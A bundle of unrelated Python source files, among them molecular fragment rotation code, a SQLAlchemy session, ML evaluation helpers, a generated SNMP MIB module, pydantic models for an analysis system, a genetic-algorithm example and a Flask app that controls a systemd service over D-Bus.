if not adjustmol:
rotmat_l = external.transformations.rotation_matrix((-rotation / 2.0), axis, a3.position)
rotmat_r = external.transformations.rotation_matrix((rotation / 2.0), axis, a3.position)
a1.position = apply_4x4_transform(rotmat_l, a1.position)
a4.position = apply_4x4_transform(rotmat_r, a4.position)
else:
mol = a2.molecule
indices, sign = _get_fragment_indices(mol, a3, a2)
rotmat = external.transformations.rotation_matrix(rotation, axis*sign, a3.position)
mol.positions[indices] = apply_4x4_transform(rotmat, mol.positions[indices])
def _get_fragment(mol, a1, a2):
"""
Given a pair of atoms a1 and a2, return two fragments, one composed of all atoms on a1's
side of the molecule, the other composed of all atoms on a2's side of the molecule.
This won't work if a1 and a2 are in a cycle.
"""
# DFS for a1's side of the bond. To prevent visiting a2, we mark it as visited at the start
visited = set([a2])
def dfs_dive(atom):
visited.add(atom)
for nbr in atom.bond_graph:
if nbr is a2 and atom is not a1:
raise ValueError("a1 and a2 are in a cyclic moiety")
if nbr not in visited:
dfs_dive(nbr)
dfs_dive(a1)
visited.remove(a2)
result = moldesign.molecules.atomcollections.AtomList(visited)
return result
def _get_fragment_indices(mol, a1, a2):
key = (mol, a1, a2)
if key in _get_fragment_indices.cache:
return _get_fragment_indices.cache[key]
# Try to get the smaller fragment ... a bit hacky right now
try: frag1 = _get_fragment(mol, a1, a2)
except ValueError:
frag1 = None
try: frag2 = _get_fragment(mol, a2, a1)
except ValueError:
if frag1 is None: raise
else:
frag = frag1
sign = 1.0
else:
if frag1 is None or len(frag1) > len(frag2):
frag = frag2
sign = -1.0
else:
frag = frag1
sign = 1.0
indices = [atom.index for atom in frag]
result = np.array(indices)
_get_fragment_indices.cache[key] = (result, sign)
return result, sign
_get_fragment_indices.cache = {}
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author : phant0ms
# @Time : 2020/8/4 15:12
# @File : session.py
from app.core.config import settings
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import scoped_session
engine = create_engine(settings.SQLALCHEMY_DATABASE_URI, pool_pre_ping= True, echo=True)
session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)
SessionLocal = scoped_session(session_factory)
|
import numpy as np
import pandas as pd
from preprocessing.InputHelper import transformLabels_aux
from collections import Counter
def plotHistogram(valueList, caption):
freqs = pd.Series(valueList).value_counts()
print (caption)
print (freqs)
#freqs.plot(kind='bar')
#plt.suptitle(caption)
#plt.show()
def getSelectedData(x, y, indexes):
x_sel = []
y_sel = []
for index in indexes:
x_sel.append(x[index])
y_sel.append(y[index])
return np.asarray(x_sel), y_sel
def printWordVecs(inpH):
#Print the loaded words
nwords=0
for w in inpH.pre_emb:
print ("Dimension of vectors: {}".format(inpH.pre_emb[w].shape))
print ("{} {}".format(w, inpH.pre_emb[w][0:5]))
nwords = nwords+1
if (nwords >= 2): break
print ("vocab size: {}".format(inpH.vocab_size))
print ("emb-matrix: {}...".format(inpH.embedding_matrix[1][:5]))
print (inpH.embedding_matrix.shape)
def convertSoftmaxToLabels(y_preds):
labels=[]
for i in range(y_preds.shape[0]):
labels.append(np.argmax(y_preds[i]))
#print (labels)
return labels
def computePerIntervalStats(y_vals, num_classes):
#[0,5] [5,10] [10, 15] [15,20] [20,30] [30,50] [50,100]
binned_y_vals = {0: [], 1: [], 2: [], 3: [], 4: [], 5: [], 6: []}
interval_stats = {0: [2.5], 1: [7.5], 2: [12.5], 3: [17.5], 4: [25], 5: [40], 6: [75]}
y_classes = transformLabels_aux(y_vals, num_classes)
i = 0
for y_class in y_classes:
binned_y_vals[y_class].append(y_vals[i])
i+=1
for key in binned_y_vals:
values_in_range = binned_y_vals.get(key)
if len(values_in_range) > 0:
values_in_range = np.asarray(values_in_range, dtype=np.float32)
median = np.median(values_in_range)
interval_stats[key] = float(median)
return interval_stats
# predict the median of values within a predicted class to be the o/p value
#compute rmse wrt to the true values
def computeTwoStagedRMSE(num_classes, fold_id, y_preds, y_train_vals, y_test_vals):
# y_preds are discrete integers (classes), y_test_vals are real numbers
# first obtain the medians for each class from the y_test_vals
interval_stats = computePerIntervalStats(y_train_vals, num_classes);
y_pred_vals = []
for y_pred in y_preds:
#print ("y_pred = {}".format(y_pred))
y_pred_vals.append(float(interval_stats[y_pred]))
#print ("y_test_vals = {}".format(y_test_vals))
y = np.asarray(y_test_vals, dtype=np.float32)
y_hats = np.asarray(y_pred_vals, dtype=np.float32)
mse = (np.square(y - y_hats)).mean(axis=None)
rmse = sqrt(mse)
print ("Fold {}: Two-step RMSE: {}".format(fold_id, rmse))
return rmse
|
#
# PySNMP MIB module IANA-FINISHER-MIB (http://pysnmp.sf.net)
# ASN.1 source http://mibs.snmplabs.com:80/asn1/IANA-FINISHER-MIB
# Produced by pysmi-0.0.7 at Sun Feb 14 00:15:44 2016
# On host bldfarm platform Linux version 4.1.13-100.fc21.x86_64 by user goose
# Using Python version 3.5.0 (default, Jan 5 2016, 17:11:52)
#
( ObjectIdentifier, OctetString, Integer, ) = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
( NamedValues, ) = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
( ConstraintsUnion, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ) = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
( ModuleCompliance, NotificationGroup, ) = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
( Integer32, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, ObjectIdentity, Unsigned32, ModuleIdentity, NotificationType, MibIdentifier, IpAddress, Bits, iso, mib_2, Counter32, TimeTicks, ) = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "ObjectIdentity", "Unsigned32", "ModuleIdentity", "NotificationType", "MibIdentifier", "IpAddress", "Bits", "iso", "mib-2", "Counter32", "TimeTicks")
( TextualConvention, DisplayString, ) = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ianafinisherMIB = ModuleIdentity((1, 3, 6, 1, 2, 1, 110)).setRevisions(("2004-06-02 00:00",))
if mibBuilder.loadTexts: ianafinisherMIB.setLastUpdated('200406020000Z')
if mibBuilder.loadTexts: ianafinisherMIB.setOrganization('IANA')
if mibBuilder.loadTexts: ianafinisherMIB.setContactInfo('Internet Assigned Numbers Authority\n\n Postal: ICANN\n 4676 Admiralty Way, Suite 330\n Marina del Rey, CA 90292\n\n Tel: +1 310 823 9358\n E-Mail: iana@iana.org')
if mibBuilder.loadTexts: ianafinisherMIB.setDescription('This MIB module defines a set of finishing-related\n TEXTUAL-CONVENTIONs for use in Finisher MIB (RFC 3806)\n and other MIBs which need to specify finishing\n mechanism details.\n\n Any additions or changes to the contents of this MIB\n module require either publication of an RFC, or\n Designated Expert Review as defined in RFC 2434,\n Guidelines for Writing an IANA Considerations Section\n in RFCs. The Designated Expert will be selected by\n the IESG Area Director(s) of the Applications Area.\n\n Copyright (C) The Internet Society (2004). The\n\n initial version of this MIB module was published\n in RFC 3806. For full legal notices see the RFC\n itself or see:\n http://www.ietf.org/copyrights/ianamib.html')
class FinDeviceTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("stitcher", 3), ("folder", 4), ("binder", 5), ("trimmer", 6), ("dieCutter", 7), ("puncher", 8), ("perforater", 9), ("slitter", 10), ("separationCutter", 11), ("imprinter", 12), ("wrapper", 13), ("bander", 14), ("makeEnvelope", 15), ("stacker", 16), ("sheetRotator", 17), ("inserter", 18),)
class FinAttributeTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 30, 31, 40, 50, 80, 81, 82, 83, 100, 130, 160, 161, 162,))
namedValues = NamedValues(("other", 1), ("deviceName", 3), ("deviceVendorName", 4), ("deviceModel", 5), ("deviceVersion", 6), ("deviceSerialNumber", 7), ("maximumSheets", 8), ("finProcessOffsetUnits", 9), ("finReferenceEdge", 10), ("finAxisOffset", 11), ("finJogEdge", 12), ("finHeadLocation", 13), ("finOperationRestrictions", 14), ("finNumberOfPositions", 15), ("namedConfiguration", 16), ("finMediaTypeRestriction", 17), ("finPrinterInputTraySupported", 18), ("finPreviousFinishingOperation", 19), ("finNextFinishingOperation", 20), ("stitchingType", 30), ("stitchingDirection", 31), ("foldingType", 40), ("bindingType", 50), ("punchHoleType", 80), ("punchHoleSizeLongDim", 81), ("punchHoleSizeShortDim", 82), ("punchPattern", 83), ("slittingType", 100), ("wrappingType", 130), ("stackOutputType", 160), ("stackOffset", 161), ("stackRotation", 162),)
class FinEdgeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(3, 4, 5, 6,))
namedValues = NamedValues(("topEdge", 3), ("bottomEdge", 4), ("leftEdge", 5), ("rightEdge", 6),)
class FinStitchingTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6, 7, 8, 9, 10,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("stapleTopLeft", 4), ("stapleBottomLeft", 5), ("stapleTopRight", 6), ("stapleBottomRight", 7), ("saddleStitch", 8), ("edgeStitch", 9), ("stapleDual", 10),)
class FinStitchingDirTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(2, 3, 4,))
namedValues = NamedValues(("unknown", 2), ("topDown", 3), ("bottomUp", 4),)
class FinStitchingAngleTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5,))
namedValues = NamedValues(("unknown", 2), ("horizontal", 3), ("vertical", 4), ("slanted", 5),)
class FinFoldingTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("zFold", 3), ("halfFold", 4), ("letterFold", 5),)
class FinBindingTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6, 7, 8, 9, 10, 11,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("tape", 4), ("plastic", 5), ("velo", 6), ("perfect", 7), ("spiral", 8), ("adhesive", 9), ("comb", 10), ("padding", 11),)
class FinPunchHoleTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("round", 3), ("oblong", 4), ("square", 5), ("rectangular", 6), ("star", 7),)
class FinPunchPatternTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("twoHoleUSTop", 4), ("threeHoleUS", 5), ("twoHoleDIN", 6), ("fourHoleDIN", 7), ("twentyTwoHoleUS", 8), ("nineteenHoleUS", 9), ("twoHoleMetric", 10), ("swedish4Hole", 11), ("twoHoleUSSide", 12), ("fiveHoleUS", 13), ("sevenHoleUS", 14), ("mixed7H4S", 15), ("norweg6Hole", 16), ("metric26Hole", 17), ("metric30Hole", 18),)
class FinSlittingTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("slitAndSeparate", 4), ("slitAndMerge", 5),)
class FinWrappingTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("shrinkWrap", 4), ("paperWrap", 5),)
class FinStackOutputTypeTC(Integer32, TextualConvention):
subtypeSpec = Integer32.subtypeSpec+ConstraintsUnion(SingleValueConstraint(1, 2, 4, 5, 6,))
namedValues = NamedValues(("other", 1), ("unknown", 2), ("straight", 4), ("offset", 5), ("crissCross", 6),)
mibBuilder.exportSymbols("IANA-FINISHER-MIB", FinFoldingTypeTC=FinFoldingTypeTC, FinStitchingAngleTypeTC=FinStitchingAngleTypeTC, FinPunchPatternTC=FinPunchPatternTC, FinAttributeTypeTC=FinAttributeTypeTC, FinStackOutputTypeTC=FinStackOutputTypeTC, FinSlittingTypeTC=FinSlittingTypeTC, FinBindingTypeTC=FinBindingTypeTC, FinStitchingDirTypeTC=FinStitchingDirTypeTC, ianafinisherMIB=ianafinisherMIB, FinPunchHoleTypeTC=FinPunchHoleTypeTC, FinEdgeTC=FinEdgeTC, PYSNMP_MODULE_ID=ianafinisherMIB, FinWrappingTypeTC=FinWrappingTypeTC, FinDeviceTypeTC=FinDeviceTypeTC, FinStitchingTypeTC=FinStitchingTypeTC)
|
import random
from random import randint
from datetime import datetime, timedelta
f=open('myDataStock.csv','w',encoding='UTF-8')
food = ["chicken", "bread", "lettuce", "potato", "carotte", "rice", "pork", "mushroom", "tomato", "egg", "beef"]
x = datetime.now()
id = 0
for i in range(365):
orderDay = str(x) + ","
for order in range(len(food)):
orderNumber = str(id) + ","
itemName = food[order] + ","
quantity = randint(0,300)
line = orderNumber+orderDay+itemName+str(quantity)+"\n"
f.write(line)
id = id+1
x = x - timedelta(days=1)
f.close()
"""
OrderNumber,OrderDate,ItemName,Quantity,ProductPrice
"""
|
# vim: sw=4:ts=4:et:cc=120
#
# data models used to communicate over HTTP
#
import datetime
import json
import uuid
from typing import Optional, Any, Union
from ace.time import utc_now
from pydantic import BaseModel, Field
from pydantic.json import pydantic_encoder
class DetectionPointModel(BaseModel):
"""Represents a detection made during analysis."""
description: str = Field(..., description="brief one line description of what was detected")
details: Optional[str] = Field(description="optional detailed description of the detection")
class DetectableObjectModel(BaseModel):
"""Base class for objects that can have Detection Points."""
detections: Optional[list[DetectionPointModel]] = Field(
description="the list of detection points", default_factory=list
)
class TaggableObjectModel(BaseModel):
tags: Optional[list[str]] = Field(description="the list of tags added to this object", default_factory=list)
class AnalysisModuleTypeModel(BaseModel):
name: str = Field(description="the name of the analysis module which must be unique to another analysis modules")
description: str = Field(description="human readable description of what the analysis module does")
observable_types: list[str] = Field(
default_factory=list,
description="""List of observable types this analysis module will analyze.
An empty list means all observable types are supported.""",
)
directives: list[str] = Field(
default_factory=list,
description="""List of required directives for this analysis module.
An observable must have ALL of these directives added for this analysis module to accept it.
An empty list means this analysis module has no required directives.""",
)
dependencies: list[str] = Field(
default_factory=list,
description="""The list of analysis modules this module is dependant on.
ACE waits until all dependencies are met before submitting the analysis request to the module.
Analysis requests will contain the results of the dependent analysis.
An empty list means this analysis module has no dependencies.""",
)
tags: list[str] = Field(
default_factory=list,
description="""The list of all required tags for this analysis module.
An analysis request will not created for this analysis module unless the target observable has all the tags listed.
An empty list means this module has no required tags.""",
)
modes: list[str] = Field(
default_factory=list,
description="""The list of valid analysis modes for this module.
The analysis_mode property of the RootAnalysis must be set to one of these values.
An empty list means that this module runs in all analysis modes.""",
)
conditions: list[str] = Field(
default_factory=list,
description="""TODO""",
)
version: str = Field(
"1.0.0",
description="""Free form version of the module.
This value should be updated when the analysis module is updated.""",
)
timeout: int = Field(
30,
description="""The amount of time (in seconds) the module has to
analyze the observable until it is considered to be timed out.""",
)
cache_ttl: Optional[int] = Field(
description="""The amount of time (in seconds) that analysis results generated by this module are cached.
Setting this value to None disables caching for this module."""
)
extended_version: dict[str, str] = Field(
default_factory=dict,
description="""An optional dictionary of arbitrary key/value pairs that
can be used to add additional version data to the module. Analysis
modules that use some kind of external data can use these fields to
include the version of the data that was used at the time of analysis.
For example, an analysis module that uses yara rules might want to
include the version of the rules that was used. In the following
example, a git remote is used as the key and the commit level of the
repo is used as the value. This would allow an analyst to know what
rules were used when this analysis was performed.
{ "git@some.server.com:yara_rules.git": "3d71bcef38ff86bdc44365dc4ce6cf549afbb00b" }
The extended_version field is also used when analysis results are
cached. The cache key are the values that are used to look up results
in the result cache. By default ACE uses the
- type
- value
- time (if available)
- name
- version
All elements of this dictionary are also appended to this key. For
example, if the analysis module uses signatures, the hash of the
signatures could be used here which would automatically invalidate
cache results when it changed.""",
)
types: list[str] = Field(default_factory=list, description="""Optional list of module catagorization types.""")
manual: Optional[bool] = Field(
description="""If set to True then this analysis module only execute when requested."""
)
class AnalysisModel(DetectableObjectModel, TaggableObjectModel, BaseModel):
"""The results of an analysis performed by an analysis module on an observable."""
uuid: Optional[str] = Field(
default_factory=lambda: str(uuid.uuid4()), description="Unique identifier for this analysis." ""
)
type: Optional[AnalysisModuleTypeModel] = Field(description="""The analysis module that generated this result.""")
observable_id: Optional[str] = Field(description="""The observable this analysis is for.""")
observable_ids: Optional[list[str]] = Field(
default_factory=list, description="""The list of observables discovered during this analysis."""
)
summary: Optional[str] = Field(description="""A brief human readable description of the results of the analysis.""")
details: Optional[Any] = Field(
description="""The free-form result of the analysis (must be a serializable into JSON.)"""
)
error_message: Optional[str] = Field(description="""The error message for when analysis has failed.""")
stack_trace: Optional[str] = Field(description="""Optional stack trace for error messages.""")
class ObservableModel(DetectableObjectModel, TaggableObjectModel, BaseModel):
"""Something that was observed during analysis."""
uuid: Optional[str] = Field(
default_factory=lambda: str(uuid.uuid4()), description="Unique identifier for this observable." ""
)
type: str = Field(
...,
description="""The type of the observable. This can
be a string of any value, but the value may have meaning to another
analysis modules.""",
)
value: str = Field(
...,
description="""Free form value of the observable.
The precise meaning of the value depends on the type. Complex
values should be base64 encoded.""",
)
time: Optional[datetime.datetime] = Field(
description="""Optional time at which the value was observed.
Observables without time are assumed to have occured when the root
event occured."""
)
context: Optional[str] = Field(
description="""Optional context surrounding the observation. This is
used to communicate additional information to the analysts, such as
where the observation was made. For example, "Source IP address of the
sender of the email." or "From address in the email.",
"""
)
analysis: Optional[dict[str, AnalysisModel]] = Field(
default_factory=dict,
description="""The record of all analysis performed on this
observable. The keys are the names of the analysis module types.
The values are the analyis objects for the module types.""",
)
directives: Optional[list[str]] = Field(
default_factory=list, description="""The list of directives added to this observable."""
)
redirection: Optional[str] = Field(description="""Optional observable target for redirection.""")
links: Optional[list[str]] = Field(
default_factory=list,
description="""The list of observables linked to this observable.
Observables that are linked receive the same tags.""",
)
limited_analysis: Optional[list[str]] = Field(
default_factory=list,
description="""The list of analysis modules this observable is
limited to. The modules in this list are the only modules that will
analyze this observable. An empty list means there are no
limitation.""",
)
excluded_analysis: Optional[list[str]] = Field(
default_factory=list,
description="""The list of analysis modules that are excluded by
this observable. Modules in this list are not executed against this
observable. An empty list means nothing is excluded.""",
)
requested_analysis: Optional[list[str]] = Field(
default_factory=list,
description="""The list of analysis modules that have been requested
for this observable. This is the only means of executing manual
analysis modules. An empty list means nothing is specifically
requested.""",
)
relationships: Optional[dict[str, list[str]]] = Field(
default_factory=dict,
description="""A mapping of relationships between this observable
and other observables. The key is the name of the relationship. The
value for each key is a list of one or more observables related in
this way.""",
)
grouping_target: Optional[bool] = Field(
description="""An optional boolean value that indicates this
observable should be used as the "grouping target" for all
observables of it's type."""
)
request_tracking: Optional[dict[str, str]] = Field(
default_factory=dict,
description="""The mapping of analysis requests for this observable.
The key is the analysis module type, the value is the analysis
request.""",
)
class RootAnalysisModel(AnalysisModel, BaseModel):
tool: Optional[str] = Field(
description="""The name of the tool that
generated the alert (ex: splunk)."""
)
tool_instance: Optional[str] = Field(
description="""The instance of the
tool that generated the alert (ex: the hostname of the sensor)."""
)
alert_type: Optional[str] = Field(description="""The type of the alert (ex: splunk - ipv4 search).""")
description: Optional[str] = Field(
"""A brief one line description of the
alert (ex: high_pdf_xor_kernel32 match in email attachment)."""
)
event_time: Optional[datetime.datetime] = Field(
default_factory=utc_now,
description="""Returns a datetime object representing the time this
event was created or occurred.""",
)
name: Optional[str] = Field(
description="""An optional property that defines a name for an alert.
Used to track and document analyst response instructions."""
)
state: Optional[dict] = Field(
default_factory=dict,
description="""A free form dict that can store any value. Used by
AnalysisModules to maintain state.""",
)
analysis_mode: Optional[str] = Field(
description="""The current analysis mode. The mode determines what
analysis modules are executed against the observables in this
root."""
)
queue: Optional[str] = Field(
description="""The optional name of the queue this alert should be put
into."""
)
instructions: Optional[str] = Field(
default_factory=lambda: str(uuid.uuid4()),
description="""An optional human readable list of instructions that an
analyst should perform when manually reviewing this alert.""",
)
version: Optional[str] = Field(
description="""An optional version string that automatically changes
every time the root is modified. The version must match when updating."""
)
expires: Optional[bool] = Field(
False,
description="""An optional boolean value if determines if this root
will expire. If this is set to True this root analysis will
automatically be deleted if all analysis has been completed and no
detection points were added.""",
)
analysis_cancelled: Optional[bool] = Field(
False, description="""Set this value to True to cancel any outstanding analysis requests for this root."""
)
analysis_cancelled_reason: Optional[str] = Field(
description="""Optional human readable description of why analysis was canceled for this root."""
)
observable_store: Optional[dict[str, ObservableModel]] = Field(
default_factory=dict,
description="""The mapping that contains all observables for this
entire root. The key is the uuid of the observable, the value is the
observable. All analysis references these objects by their keys.""",
)
class AnalysisRequestModel(BaseModel):
id: Optional[str] = Field(
default_factory=lambda: str(uuid.uuid4()), description="""The unique id for this request."""
)
root: Optional[Union[str, RootAnalysisModel]] = Field(
description="""The root this request is for. If this is a string
then it is a reference to an existing analysis. Otherwise it is a
full root object."""
)
observable: Optional[ObservableModel] = Field(description="""The observable this request is for.""")
type: Optional[AnalysisModuleTypeModel] = Field(description="""The analysis module type this request is for.""")
cache_hit: Optional[bool] = Field(
False, description="""If this is True then this request is the result of a cache hit."""
)
status: Optional[str] = Field(description="""The current status of this analysis request.""")
owner: Optional[str] = Field(description="""The current owner of this analysis request.""")
original_root: Optional[RootAnalysisModel] = Field(
description="""The root as it existed before analysis started."""
)
modified_root: Optional[RootAnalysisModel] = Field(
description="""The root as it existed after analyisis completed."""
)
class ContentMetadata(BaseModel):
name: str = Field(description="""Name of the content which can be anything such as the name of the file.""")
sha256: Optional[str] = Field(description="""SHA2 (lowercase hex) of the content.""")
size: Optional[int] = Field(description="""Size of the content in bytes.""")
insert_date: Optional[datetime.datetime] = Field(
default_factory=utc_now,
description="""When the content was created. Defaults to now.""",
)
roots: Optional[list[str]] = Field(
default_factory=list,
description="""List of RootAnalysis UUIDs that reference this content.""",
)
location: Optional[str] = Field(description="""Free-form location of the content. Can be None if not used.""")
expiration_date: Optional[datetime.datetime] = Field(
description="""When the content should be discarded. Defaults to None which means never discarded.""",
)
custom: Optional[str] = Field(
description="""Optional str for storing any other required custom properties of the content.""",
)
class Event(BaseModel):
name: str = Field(description="""Unique name of the event.""")
args: Optional[Any] = Field(description="""Optional arguments included with the event.""")
class ConfigurationSetting(BaseModel):
name: str = Field(description="""Unique name of the configuration setting.""")
value: Any = Field(description="""Value of the configuration setting.""")
documentation: Optional[str] = Field(description="""Documentation that explains the configuration setting.""")
class AnalysisRequestQueryModel(BaseModel):
owner: str = Field(
description="""A unique name that identifies what is making the request. This value is tied to the analysis request for the purposes of tracking."""
)
amt: str = Field(description="The analysis module type this request is for.")
timeout: int = Field(
description="The amount of time (in seconds) to wait for a request to become available. If no requests become available during this time then an empty response is returned."
)
version: str = Field(
description="The current version of the analysis module type. This value must match what is registered."
)
extended_version: Optional[dict[str, str]] = Field(
[],
description="The optional extended version of the analysis module type. This value must match was is registered if it is used.",
)
class AlertListModel(BaseModel):
root_uuids: list[str]
class ErrorModel(BaseModel):
code: str
details: str
class ApiKeyModel(BaseModel):
api_key: str
name: str
description: Optional[str]
is_admin: bool = Field("True if the key is an administrative level key.")
class ApiKeyListModel(BaseModel):
api_keys: list[ApiKeyModel]
def custom_json_encoder(obj):
if hasattr(obj, "to_dict"):
return obj.to_dict()
else:
return pydantic_encoder(obj)
class CustomJSONEncoder(json.JSONEncoder):
def default(self, obj):
return pydantic_encoder(obj)
|
from PyGARV import *
"""
This class implements a Genetic Algorithm to maximize the following
function.
max f = 20x + 60y
subject to:
30x + 20y >= 2700
5x + 10y <= 850
x + y >= 95
x, y >= 0
"""
class Example(PyGARV):
def __init__(self):
#You can find out what each parameter does
#looking at the source code of PyGARV class.
super().__init__( popSize = 60,
values = 2,
mutationRate = 0.1, #10%
fullMutation = True,
symmetricCut = True,
crossoverRate = 1,
elitism = 0.3, #30%
digits = 6 )
def fitness(self, chromosome):
#gets the first integer value stored on the chromosome and divides
#it by 100 to change the value to a float with two decimal places.
x = chromosome[0]/100
#gets the second integer value stored on the chromosome and divides
#it by 100 to change the value to a float with two decimal places.
y = chromosome[1]/100
#computes the funciont to be maximized.
f = 20*x + 60*y
if(
30*x + 20*y >= 2700 and
5*x + 10*y <= 850 and
x + y >= 95 and
x > 0 and
y > 0
):
#the f value will be used as a rating for the chromosome. As bigger
#value assumes better will be the rating of this specific chromosome.
#IMPORTANT NOTE: the rating value can never be zero.
rating = f
else:
#it's not permited to have chromosomes that dont respect the restrictions
#so, if any restriction is broken the chromosome is severily penalized.
rating = 1/(f+1) #IMPORTANT NOTE: the rating value can never be zero.
#the fitness function always must returns the
#chromosome being assesed and it's rating value
return [chromosome, rating]
def finishedGA(self, bestChromosome):
#gets the first integer value stored on the best chromosome
#created by the Genetic Algorithm after all generations.
x = bestChromosome[0]/100
#gets the second integer value stored on the best chromosome
#created by the Genetic Algorithm after all generations.
y = bestChromosome[1]/100
print("x: %f y: %f max(f): %f" % (x, y, (20*x + 60*y)))
garv = Example()
garv.runGA(1000) #runs the Genetic Algorithm for 1000 generations
|
#!/usr/bin/env python
# created by Bruce Yuan on 17-11-27
from inspect import signature
from pylimit.limit_error import LimitError
from pylimit.list_limit import check_type
from pylimit.type_limit import type_limit
import functools
def tuple_limit(**info):
"""
这个其实和 list_limit基本是一样的,可是需要考虑到 tuple 基本是不会变化的
而且tuple一般在传值的时候也都是固定的,所以不会扩展
所以这里就只提供一种限定方式
对传入的参数每一项进行对应。
ie.
def test(a):
print(a)
我们希望 a 里面每一项分别对应,即假如我们希望这个 tuple的形式为 a = [str, int, dict]
那么我们就加上装饰器
@tuple_limit(a=[str, int, dict])
def test(a):
pass
当然其实这个很好扩展,只是觉得用处不大,如果你想做成原来那种list_limit中 a = (int, 3)
==> 表示这个tuple中有三个int型的数据
如果你想使用别的限制,其实这个库提供了一种更好用的方式,那就是自定义限定,具体可以查看自定义check如何使用
:param info:
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
sig = signature(func)
bound_arguments = sig.bind(*args, **kwargs)
for name, value in bound_arguments.arguments.items():
input_type = info.get(name)
length = len(input_type)
if len(value) == length:
# 检查每一项是否对应
for i in range(length):
check_type(value[i], input_type[i])
else:
raise LimitError(
"the set type length is {}, but the input parameter length is {}".format(
length,
len(value)
)
)
return func(*args, **kwargs)
return wrapper
return decorator
def main():
@tuple_limit(a=[int, str, dict])
@type_limit
def test(a: tuple):
print(a)
test((1, "string", {}))
if __name__ == '__main__':
main()
|
# app.py
# also importing the request module
from flask import Flask, render_template, request
import sys,os
import configparser
import dbus
app = Flask(__name__)
app.config["CACHE_TYPE"] = "null"
dir = os.path.dirname(__file__)
filename = os.path.join(dir, '../../config/rgb_options.ini')
# Configuration for the matrix
config = configparser.ConfigParser()
config.read(filename)
sysbus = dbus.SystemBus()
systemd1 = sysbus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(systemd1, 'org.freedesktop.systemd1.Manager')
# home route
@app.route("/")
def saved_config():
# Brightness from config file
brightness = int(config['DEFAULT']['brightness'])
width = int(config['DEFAULT']['rows'])
height = int(config['DEFAULT']['columns'])
power = config['DEFAULT']['power']
return render_template('index.html', brightness = brightness, width = width, height = height, power = power)
# handling power status
@app.route("/power", methods=["GET", "POST"])
def handle_power():
power = request.form['power']
brightness = int(config['DEFAULT']['brightness'])
width = int(config['DEFAULT']['rows'])
height = int(config['DEFAULT']['columns'])
config.set('DEFAULT', 'power', request.form['power'])
if power == 'on':
job = manager.StartUnit('spotipi.service', 'replace')
else:
job = manager.StopUnit('spotipi.service', 'replace')
return render_template('index.html', brightness = brightness, width = width, height = height, power = power)
# handling form data
@app.route('/brightness', methods=['POST'])
def handle_brightness():
config.set('DEFAULT', 'brightness', request.form['brightness'])
width = int(config['DEFAULT']['rows'])
height = int(config['DEFAULT']['columns'])
power = config['DEFAULT']['power']
with open(filename, 'w') as configfile:
config.write(configfile)
job = manager.RestartUnit('spotipi.service', 'fail')
return render_template('index.html', brightness = request.form['brightness'], width = width, height = height, power = power)
# handling form data
@app.route('/size', methods=['POST'])
def handle_size():
config.set('DEFAULT', 'rows', request.form['width'])
config.set('DEFAULT', 'columns', request.form['height'])
brightness = int(config['DEFAULT']['brightness'])
power = config['DEFAULT']['power']
with open(filename, 'w') as configfile:
config.write(configfile)
job = manager.RestartUnit('spotipi.service', 'fail')
return render_template('index.html', brightness = brightness, width = int(request.form['width']), height = int(request.form['height']), power = power)
app.run(host='0.0.0.0', port=80)
|
"""A thread-based worker pool."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import collections
import threading
import time
import socket
import warnings
